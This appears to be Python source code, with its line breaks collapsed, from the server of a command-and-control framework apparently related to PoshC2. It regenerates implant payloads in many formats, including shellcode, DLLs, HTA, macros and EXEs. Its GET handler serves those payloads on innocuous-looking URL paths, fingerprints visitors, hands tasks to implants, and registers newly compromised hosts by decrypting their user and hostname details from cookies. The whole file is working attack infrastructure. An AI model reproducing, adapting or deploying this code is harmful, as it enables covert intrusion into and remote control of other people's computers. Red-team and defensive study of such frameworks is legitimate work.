qstart = "%squickstart.txt" % (ROOTDIR) if os.path.exists(qstart): with open(qstart, 'r') as f: print(f.read()) else: print("Error different IP so regenerating payloads") if os.path.exists("%spayloads_old" % ROOTDIR): import shutil shutil.rmtree("%spayloads_old" % ROOTDIR) os.rename("%spayloads" % ROOTDIR, "%spayloads_old" % ROOTDIR) os.makedirs("%spayloads" % ROOTDIR) C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], HostnameIP, DomainFrontHeader, C2[8], C2[12], C2[13], C2[11], "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory) new_urldetails("updated_host", HostnameIP, C2[3], "", "", "", "") update_item("HostnameIP", "C2Server", HostnameIP) update_item("QuickCommand", "C2Server", QuickCommand) update_item("DomainFrontHeader", "C2Server", DomainFrontHeader) newPayload.CreateRaw() newPayload.CreateDlls() newPayload.CreateShellcode() newPayload.CreateSCT() newPayload.CreateHTA() newPayload.CreateCS() newPayload.CreateMacro() newPayload.CreateEXE() newPayload.CreateMsbuild() newPayload.CreatePython() newPayload.WriteQuickstart(ROOTDIR + 'quickstart.txt')
def do_GET(s): """Respond to a GET request.""" logging.info("GET request,\nPath: %s\nHeaders:\n%s\n", str(s.path), str(s.headers)) new_implant_url = get_newimplanturl() s.cookieHeader = s.headers.get('Cookie') QuickCommandURI = select_item("QuickCommand", "C2Server") s.server_version = ServerHeader s.sys_version = "" if not s.cookieHeader: s.cookieHeader = "NONE" # implant gets a new task new_task = newTask(s.path) if new_task: s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(new_task) elif ("/_utm.gif") in s.path: logs = "" ip_address = ["From: %s" % s.address_string()] profiler = base64.b64decode( urlparse.parse_qs( s.path)['/_utm.gif?utmje'][0]).split("|") + ip_address logs += "%s visit from: %s" % (s.log_date_time_string(), profiler[0]) + "\n" for profile in profiler[1::]: logs += "\t%s\n" % profile logs += "\n" open("%ssystem_profiler.log" % ROOTDIR, "a").write(logs) s.send_response(200) s.end_headers() s.wfile.write("") elif ("%s_js" % QuickCommandURI) in s.path: filename = "%sFiles/fingerprint.js" % POSHDIR with open(filename, 'rb') as f: content = f.read() s.send_response(200) s.end_headers() s.wfile.write(content) elif (SYSTEM_PROFILER) in s.path: content = """<!DOCTYPE html><html><head><title></title></head><body><noscript>Please enable javascript!</noscript><script type="text/javascript" src="%s/%s_js"></script></body></html>""" % ( HostnameIP, QuickCommandURI) s.send_response(200) s.send_header("Refresh", "0.3;%s" % SYSTEM_PROFILER_REDIRECT) s.end_headers() s.wfile.write(content) elif ("%s_bs" % QuickCommandURI) in s.path: filename = "%spayload.bat" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(content) elif ("%s_rg" % QuickCommandURI) in s.path: filename = "%srg_sct.xml" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(content) elif ("%spotal" % QuickCommandURI) in s.path: filename = "%sSharp_v4_x86_Shellcode.bin" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() content = base64.b64encode(content) s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(content) elif ("%slogin" % QuickCommandURI) in s.path: filename = "%sSharp_v4_x64_Shellcode.bin" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() content = base64.b64encode(content) s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(content) elif ("%s_cs" % QuickCommandURI) in s.path: filename = "%scs_sct.xml" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(content) elif ("%s_py" % QuickCommandURI) in s.path: filename = "%saes.py" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() content = "a" + "".join("{:02x}".format(ord(c)) for c in content) s.send_response(200) s.send_header("Content-type", "text/plain") s.end_headers() s.wfile.write(content) elif ("%s_ex" % QuickCommandURI) in s.path: filename = "%sPosh32.exe" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() s.send_response(200) s.send_header("Content-type", "application/x-msdownload") s.end_headers() s.wfile.write(content) elif ("%s_ex6" % QuickCommandURI) in s.path: filename = "%sPosh64.exe" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() s.send_response(200) s.send_header("Content-type", "application/x-msdownload") s.end_headers() s.wfile.write(content) # register new implant elif new_implant_url in s.path and s.cookieHeader.startswith( "SessionID"): implant_type = "Normal" if s.path == ("%s?p" % new_implant_url): implant_type = "Proxy" if s.path == ("%s?d" % new_implant_url): implant_type = "Daisy" if s.path == ("%s?m" % new_implant_url): implant_type = "OSX" if s.path == ("%s?c" % new_implant_url): implant_type = "C#" if s.path == ("%s?p?c" % new_implant_url): implant_type = "C#" if s.path == ("%s?d?c" % new_implant_url): implant_type = "C#" if implant_type == "C#": cookieVal = (s.cookieHeader).replace("SessionID=", "") decCookie = decrypt(KEY, cookieVal) IPAddress = "%s:%s" % (s.client_address[0], s.client_address[1]) Domain, User, Hostname, Arch, PID, Proxy = decCookie.split(";") user = User.decode("utf-8") if "\\" in user: user = user[user.index("\\") + 1:] newImplant = Implant(IPAddress, implant_type, Domain.decode("utf-8"), user, Hostname.decode("utf-8"), Arch, PID, Proxy) newImplant.save() newImplant.display() responseVal = encrypt(KEY, newImplant.SharpCore) s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(responseVal) elif implant_type == "OSX": cookieVal = (s.cookieHeader).replace("SessionID=", "") decCookie = decrypt(KEY, cookieVal) IPAddress = "%s:%s" % (s.client_address[0], s.client_address[1]) User, Domain, Hostname, Arch, PID, Proxy = decCookie.split(";") newImplant = Implant(IPAddress, implant_type, Domain.decode("utf-8"), User.decode("utf-8"), Hostname.decode("utf-8"), Arch, PID, Proxy) newImplant.save() newImplant.display() responseVal = encrypt(KEY, newImplant.PythonCore) s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(responseVal) else: try: cookieVal = (s.cookieHeader).replace("SessionID=", "") decCookie = decrypt(KEY, cookieVal) Domain, User, Hostname, Arch, PID, Proxy = decCookie.split( ";") IPAddress = "%s:%s" % (s.client_address[0], s.client_address[1]) user = User.decode("utf-8") if "\\" in user: user = user[user.index('\\') + 1:] newImplant = Implant(IPAddress, implant_type, Domain.decode("utf-8"), user, Hostname.decode("utf-8"), Arch, PID, Proxy) newImplant.save() newImplant.display() newImplant.autoruns() responseVal = encrypt(KEY, newImplant.PSCore) s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(responseVal) except Exception as e: print("Decryption error: %s" % e) s.send_response(404) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(HTTPResponse) else: s.send_response(404) s.send_header("Content-type", "text/html") s.end_headers() HTTPResponsePage = select_item("HTTPResponse", "C2Server") if HTTPResponsePage: s.wfile.write(HTTPResponsePage) else: s.wfile.write(HTTPResponse)